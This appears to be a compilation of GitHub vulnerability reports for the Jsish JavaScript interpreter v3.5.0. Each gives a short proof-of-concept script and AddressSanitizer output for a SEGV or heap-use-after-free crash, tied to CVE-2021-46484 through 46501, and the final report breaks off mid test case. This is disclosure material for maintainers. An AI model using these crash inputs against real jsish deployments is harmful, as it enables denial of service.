Jsish v3.5.0 was discovered to contain a SEGV vulnerability via jsi_ArrayConcatCmd at src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS).

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var i \= 0;

function JSEtest()
{
  arr\[arr\[1000\] \= 3\] \= 3;
  i++;
}

var arr \= new Array(10);
arr\[2\] \= 2;
arr.concat(JSEtest);

(arr.reduceRight(arr.concat), 0, '1');

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

ASAN:DEADLYSIGNAL
=================================================================
==121369==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x563e6997e690 bp 0x00000000000a sp 0x7ffcb3c19980 T0)
==121369==The signal is caused by a READ memory access.
==121369==Hint: address points to the zero page.
    #0 0x563e6997e68f in jsi\_ArrayConcatCmd src/jsiArray.c:311
    #1 0x563e69943818 in jsi\_FuncCallSub src/jsiProto.c:244
    #2 0x563e698c0fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #3 0x563e698c0fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #4 0x563e69985851 in jsi\_ArrayReduceSubCmd src/jsiArray.c:641
    #5 0x563e69985851 in jsi\_ArrayReduceRightCmd src/jsiArray.c:672
    #6 0x563e69943818 in jsi\_FuncCallSub src/jsiProto.c:244
    #7 0x563e69c0d71a in jsiFunctionSubCall src/jsiEval.c:796
    #8 0x563e69c0d71a in jsiEvalFunction src/jsiEval.c:837
    #9 0x563e69c0d71a in jsiEvalCodeSub src/jsiEval.c:1264
    #10 0x563e69c2115e in jsi\_evalcode src/jsiEval.c:2204
    #11 0x563e69c25274 in jsi\_evalStrFile src/jsiEval.c:2665
    #12 0x563e6991466a in Jsi\_Main src/jsiInterp.c:936
    #13 0x563e6a11903a in jsi\_main src/main.c:47
    #14 0x7fde1e7babf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #15 0x563e698a8969 in \_start (/usr/local/bin/jsish+0xe8969)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsiArray.c:311 in jsi\_ArrayConcatCmd

Credits: Found by OWL337 team.

CVE-2021-46488: SEGV src/jsiArray.c:311 in jsi_ArrayConcatCmd · Issue #68 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_ArgTypeCheck in src/jsiFunc.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 2 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var JSEtest \= \[
  'aa',
  'gg',
  'hhh',
  'mm',
  'nn'
\];
'sort:' + JSEtest.sort(function (str, position) {
  return JSEtest.unshift('pop:' + JSEtest.pop());
});
!'concat:' + JSEtest.concat().every(function (E) {
  return 'sort:' + JSEtest.sort(function (str, position) {
    return JSEtest.unshift('pop:' + JSEtest.pop());
  });
});

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
=====ERROR: AddressSanitizer: heap-use-after-free on address 0x603000007458 at pc 0x5566730cf1ca bp 0x7ffe092500c0 sp 0x7ffe092500b0
READ of size 1 at 0x603000007458 thread T0
    #0 0x5566730cf1c9 in jsi\_ArgTypeCheck src/jsiFunc.c:207
    #1 0x556673158c49 in jsi\_FuncCallSub src/jsiProto.c:263
    #2 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796
    #3 0x55667342171a in jsiEvalFunction src/jsiEval.c:837
    #4 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264
    #5 0x55667343515e in jsi\_evalcode src/jsiEval.c:2204
    #6 0x556673158834 in jsi\_FuncCallSub src/jsiProto.c:220
    #7 0x5566730d4fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #8 0x5566730d4fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #9 0x556673186fa8 in SortSubCmd src/jsiArray.c:970
    #10 0x7f067f973311  (/lib/x86\_64-linux-gnu/libc.so.6+0x42311)
    #11 0x7f067f9736b5 in qsort\_r (/lib/x86\_64-linux-gnu/libc.so.6+0x426b5)
    #12 0x55667318a611 in jsi\_ArraySortCmd src/jsiArray.c:1065
    #13 0x556673157818 in jsi\_FuncCallSub src/jsiProto.c:244
    #14 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796
    #15 0x55667342171a in jsiEvalFunction src/jsiEval.c:837
    #16 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264
    #17 0x55667343515e in jsi\_evalcode src/jsiEval.c:2204
    #18 0x556673158834 in jsi\_FuncCallSub src/jsiProto.c:220
    #19 0x5566730d4fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #20 0x5566730d4fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #21 0x55667319bf64 in jsi\_ArrayFindSubCmd src/jsiArray.c:576
    #22 0x55667319bf64 in jsi\_ArrayEveryCmd src/jsiArray.c:663
    #23 0x556673157818 in jsi\_FuncCallSub src/jsiProto.c:244
    #24 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796
    #25 0x55667342171a in jsiEvalFunction src/jsiEval.c:837
    #26 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264
    #27 0x55667343515e in jsi\_evalcode src/jsiEval.c:2204
    #28 0x556673439274 in jsi\_evalStrFile src/jsiEval.c:2665
    #29 0x55667312866a in Jsi\_Main src/jsiInterp.c:936
    #30 0x55667392d03a in jsi\_main src/main.c:47
    #31 0x7f067f952bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #32 0x5566730bc969 in \_start (/usr/local/bin/jsish+0xe8969)

0x603000007458 is located 8 bytes inside of 32-byte region \[0x603000007450,0x603000007470)
freed by thread T0 here:
    #0 0x7f06805c17a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x5566730dd6cf in Jsi\_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here:
    #0 0x7f06805c1d28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x55667312daa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiFunc.c:207 in jsi\_ArgTypeCheck
Shadow bytes around the buggy address:
  0x0c067fff8e30: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8e40: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c067fff8e50: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c067fff8e60: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8e70: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
\=>0x0c067fff8e80: fd fd fa fa fd fd fd fd fa fa fd\[fd\]fd fd fa fa
  0x0c067fff8e90: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8ea0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c067fff8eb0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c067fff8ec0: fd fd fd fd fa fa 00 00 00 00 fa fa fd fd fd fd
  0x0c067fff8ed0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

This issue may be related to #74 & #80, especially the POC, but I'm not for sure. Report this issue to assist your debug.

![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=88&v=4)

2 participants

 ![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46500: Heap-use-after-free src/jsiFunc.c:207 in jsi_ArgTypeCheck · Issue #85 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_wswebsocketObjFree in src/jsiWebSocket.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

console.printf\= (new WebSocket);
setTimeout(console, 100000);

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
=====ERROR: AddressSanitizer: heap-use-after-free on address 0x61b000000080 at pc 0x55b167ed6de6 bp 0x7ffcd360f220 sp 0x7ffcd360f210
READ of size 4 at 0x61b000000080 thread T0
    #0 0x55b167ed6de5 in jsi\_wswebsocketObjFree src/jsiWebSocket.c:3190
    #1 0x55b167e7ba2d in jsi\_UserObjFree src/jsiUserObj.c:75
    #2 0x55b167dfeefb in Jsi\_ObjFree src/jsiObj.c:334
    #3 0x55b167dffa0f in Jsi\_ObjDecrRefCount src/jsiObj.c:440
    #4 0x55b167cae3d1 in ValueFree src/jsiValue.c:178
    #5 0x55b167cae3d1 in Jsi\_ValueFree src/jsiValue.c:199
    #6 0x55b167cae6cf in Jsi\_DecrRefCount src/jsiValue.c:52
    #7 0x55b167dfc697 in DeleteTreeValue src/jsiObj.c:177
    #8 0x55b167e14384 in Jsi\_TreeEntryDelete src/jsiTree.c:636
    #9 0x55b167e15f10 in destroy\_node src/jsiTree.c:496
    #10 0x55b167e15f10 in destroy\_node src/jsiTree.c:494
    #11 0x55b167e15f10 in Jsi\_TreeDelete src/jsiTree.c:515
    #12 0x55b167dfe9df in Jsi\_ObjFree src/jsiObj.c:348
    #13 0x55b167dffa0f in Jsi\_ObjDecrRefCount src/jsiObj.c:440
    #14 0x55b167cae3d1 in ValueFree src/jsiValue.c:178
    #15 0x55b167cae3d1 in Jsi\_ValueFree src/jsiValue.c:199
    #16 0x55b167cae6cf in Jsi\_DecrRefCount src/jsiValue.c:52
    #17 0x55b167dbe4d4 in Jsi\_EventFree src/jsiCmds.c:204
    #18 0x55b167cd44e2 in freeEventTbl src/jsiInterp.c:570
    #19 0x55b167d768dd in Jsi\_HashClear src/jsiHash.c:507
    #20 0x55b167d76cd7 in Jsi\_HashDelete src/jsiHash.c:526
    #21 0x55b167ce787c in jsiInterpDelete src/jsiInterp.c:1936
    #22 0x55b1684fe047 in jsi\_main src/main.c:49
    #23 0x7f5c2d555bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #24 0x55b167c8d969 in \_start (/usr/local/bin/jsish+0xe8969)

0x61b000000080 is located 0 bytes inside of 1656-byte region \[0x61b000000080,0x61b0000006f8)
freed by thread T0 here:
    #0 0x7f5c2e1c47a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x55b167ed6d22 in jsi\_wswebsocketObjFree src/jsiWebSocket.c:3199

previously allocated by thread T0 here:
    #0 0x7f5c2e1c4d28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x55b167cfeaa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiWebSocket.c:3190 in jsi\_wswebsocketObjFree
Shadow bytes around the buggy address:
  0x0c367fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
\=>0x0c367fff8010:\[fd\]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46498: Heap-use-after-free src/jsiWebSocket.c:3190 in jsi_wswebsocketObjFree · Issue #81 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via SortSubCmd in src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var JSEtest \= \[
  'aa',
  'bb',
  'cc'
\];
var results \= JSEtest;
JSEtest.findIndex(function (kV) {
  JSEtest.sort(function (str, position) {
    results.push(kV);
  });
});

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
==106201==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000018678 at pc 0x56468deff5a0 bp 0x7fff9a37c2a0 sp 0x7fff9a37c290
READ of size 8 at 0x60c000018678 thread T0
    #0 0x56468deff59f in SortSubCmd src/jsiArray.c:958
    #1 0x7fb68d0b0311  (/lib/x86\_64-linux-gnu/libc.so.6+0x42311)
    #2 0x7fb68d0b027d  (/lib/x86\_64-linux-gnu/libc.so.6+0x4227d)
    #3 0x7fb68d0b027d  (/lib/x86\_64-linux-gnu/libc.so.6+0x4227d)
    #4 0x7fb68d0b06b5 in qsort\_r (/lib/x86\_64-linux-gnu/libc.so.6+0x426b5)
    #5 0x56468df02611 in jsi\_ArraySortCmd src/jsiArray.c:1065
    #6 0x56468decf818 in jsi\_FuncCallSub src/jsiProto.c:244
    #7 0x56468e19971a in jsiFunctionSubCall src/jsiEval.c:796
    #8 0x56468e19971a in jsiEvalFunction src/jsiEval.c:837
    #9 0x56468e19971a in jsiEvalCodeSub src/jsiEval.c:1264
    #10 0x56468e1ad15e in jsi\_evalcode src/jsiEval.c:2204
    #11 0x56468ded0834 in jsi\_FuncCallSub src/jsiProto.c:220
    #12 0x56468de4cfec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #13 0x56468de4cfec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #14 0x56468df0dc0b in jsi\_ArrayFindSubCmd src/jsiArray.c:576
    #15 0x56468df0dc0b in jsi\_ArrayFindIndexCmd src/jsiArray.c:666
    #16 0x56468decf818 in jsi\_FuncCallSub src/jsiProto.c:244
    #17 0x56468e19971a in jsiFunctionSubCall src/jsiEval.c:796
    #18 0x56468e19971a in jsiEvalFunction src/jsiEval.c:837
    #19 0x56468e19971a in jsiEvalCodeSub src/jsiEval.c:1264
    #20 0x56468e1ad15e in jsi\_evalcode src/jsiEval.c:2204
    #21 0x56468e1b1274 in jsi\_evalStrFile src/jsiEval.c:2665
    #22 0x56468dea066a in Jsi\_Main src/jsiInterp.c:936
    #23 0x56468e6a503a in jsi\_main src/main.c:47
    #24 0x7fb68d08fbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #25 0x56468de34969 in \_start (/usr/local/bin/jsish+0xe8969)

0x60c000018678 is located 56 bytes inside of 128-byte region \[0x60c000018640,0x60c0000186c0)
freed by thread T0 here:
    #0 0x7fb68dcfef30 in realloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdef30)
    #1 0x56468dea5972 in Jsi\_Realloc src/jsiUtils.c:47

previously allocated by thread T0 here:
    #0 0x7fb68dcfef30 in realloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdef30)
    #1 0x56468dea5972 in Jsi\_Realloc src/jsiUtils.c:47

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiArray.c:958 in SortSubCmd
Shadow bytes around the buggy address:
  0x0c187fffb070: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c187fffb080: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c187fffb090: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c187fffb0a0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c187fffb0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x0c187fffb0c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd\[fd\]
  0x0c187fffb0d0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c187fffb0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fffb0f0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c187fffb100: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c187fffb110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==106201\==ABORTING

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46501: Heap-use-after-free src/jsiArray.c:958 in SortSubCmd · Issue #86 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_ValueCopyMove in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

function JSEtest(){}

var arr \= /x?y?z?/.exec("abcd");
arr\[arr\[1000\] \= 3\](arr.every(JSEtest), arr\[1000\] \= 3, '1')

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

==99189==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000006e84 at pc 0x5637792b29cd bp 0x7ffef5f97e60 sp 0x7ffef5f97e50
READ of size 4 at 0x603000006e84 thread T0
    #0 0x5637792b29cc in jsi\_ValueCopyMove src/jsiValue.c:245
    #1 0x5637792b29cc in Jsi\_ValueCopy src/jsiValue.c:301
    #2 0x5637795f6759 in jsi\_ObjArraySetDup src/jsiEval.c:1054
    #3 0x5637795f6759 in jsi\_ValueObjKeyAssign src/jsiEval.c:1079
    #4 0x5637795f6759 in jsiEvalCodeSub src/jsiEval.c:1303
    #5 0x5637795fd15e in jsi\_evalcode src/jsiEval.c:2204
    #6 0x563779601274 in jsi\_evalStrFile src/jsiEval.c:2665
    #7 0x5637792f066a in Jsi\_Main src/jsiInterp.c:936
    #8 0x563779af503a in jsi\_main src/main.c:47
    #9 0x7f66650eebf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #10 0x563779284969 in \_start (/usr/local/bin/jsish+0xe8969)

0x603000006e84 is located 4 bytes inside of 32-byte region \[0x603000006e80,0x603000006ea0)
freed by thread T0 here:
    #0 0x7f6665d5d7a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x5637792a56cf in Jsi\_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here:
    #0 0x7f6665d5dd28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x5637792f5aa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:245 in jsi\_ValueCopyMove
Shadow bytes around the buggy address:
  0x0c067fff8d80: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
  0x0c067fff8d90: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
  0x0c067fff8da0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8db0: fa fa fd fd fd fd fa fa 00 00 04 fa fa fa 00 00
  0x0c067fff8dc0: 04 fa fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
\=>0x0c067fff8dd0:\[fd\]fd fd fd fa fa 00 00 00 00 fa fa fd fd fd fd
  0x0c067fff8de0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c067fff8df0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c067fff8e00: 00 00 00 00 fa fa 00 00 00 00 fa fa fa fa fa fa
  0x0c067fff8e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==99189\==ABORTING

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46499: Heap-use-after-free src/jsiValue.c:245 in jsi_ValueCopyMove · Issue #76 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via Jsi_IncrRefCount in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS).

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case1**

function JSEtest(assert)
{
  (arr.concat(\[\]), false, 'JSEtest');
}

var arr \= /x?y?z?/.exec("abcd");
arr\[arr\[arr\['JSEtest'\[arr\[1000\] \= 3\]\] \= 3\] \= 3\](arr.every(JSEtest), false, 'JSEtest');

**Test case2**

var list \= \[
  'aa',
  'bb',
  'cc',
  'dd',
  'hhh',
  'mm',
  'nn'
\];
'sort:' + list.sort(function (\_str, position) {
  var s \= 'sort:' + list.sort(function (str, position) {
    var s \= 'shift:' + list.shift();
  }) + list.shift();
});

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

==114358==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000007060 at pc 0x556541bb6a68 bp 0x7ffd4e8abbc0 sp 0x7ffd4e8abbb0
READ of size 4 at 0x603000007060 thread T0
    #0 0x556541bb6a67 in Jsi\_IncrRefCount src/jsiValue.c:34
    #1 0x556541d0aab5 in Jsi\_ObjNewArray src/jsiObj.c:480
    #2 0x556541c75f14 in jsi\_ArrayFindSubCmd src/jsiArray.c:573
    #3 0x556541c75f14 in jsi\_ArrayEveryCmd src/jsiArray.c:663
    #4 0x556541c31818 in jsi\_FuncCallSub src/jsiProto.c:244
    #5 0x556541efb71a in jsiFunctionSubCall src/jsiEval.c:796
    #6 0x556541efb71a in jsiEvalFunction src/jsiEval.c:837
    #7 0x556541efb71a in jsiEvalCodeSub src/jsiEval.c:1264

    #8 0x556541f0f15e in jsi\_evalcode src/jsiEval.c:2204
    #9 0x556541f13274 in jsi\_evalStrFile src/jsiEval.c:2665
    #10 0x556541c0266a in Jsi\_Main src/jsiInterp.c:936
    #11 0x55654240703a in jsi\_main src/main.c:47
    #12 0x7f7e9588dbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #13 0x556541b96969 in \_start (/usr/local/bin/jsish+0xe8969)

0x603000007060 is located 0 bytes inside of 32-byte region \[0x603000007060,0x603000007080)
freed by thread T0 here:
    #0 0x7f7e964fc7a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x556541bb76cf in Jsi\_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here:
    #0 0x7f7e964fcd28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x556541c07aa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:34 in Jsi\_IncrRefCount
Shadow bytes around the buggy address:
  0x0c067fff8db0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c067fff8dc0: fd fd fa fa 00 00 04 fa fa fa 00 00 04 fa fa fa
  0x0c067fff8dd0: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
  0x0c067fff8de0: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
  0x0c067fff8df0: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
\=>0x0c067fff8e00: fd fd fd fd fa fa 00 00 00 00 fa fa\[fd\]fd fd fd
  0x0c067fff8e10: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
  0x0c067fff8e20: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
  0x0c067fff8e30: 00 00 00 00 fa fa 00 00 00 00 fa fa fa fa fa fa
  0x0c067fff8e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8e50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

CVE-2021-46484: Heap-use-after-free src/jsiValue.c:34 in Jsi_IncrRefCount · Issue #73 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via DeleteTreeValue in src/jsiObj.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

function JSEtest() {
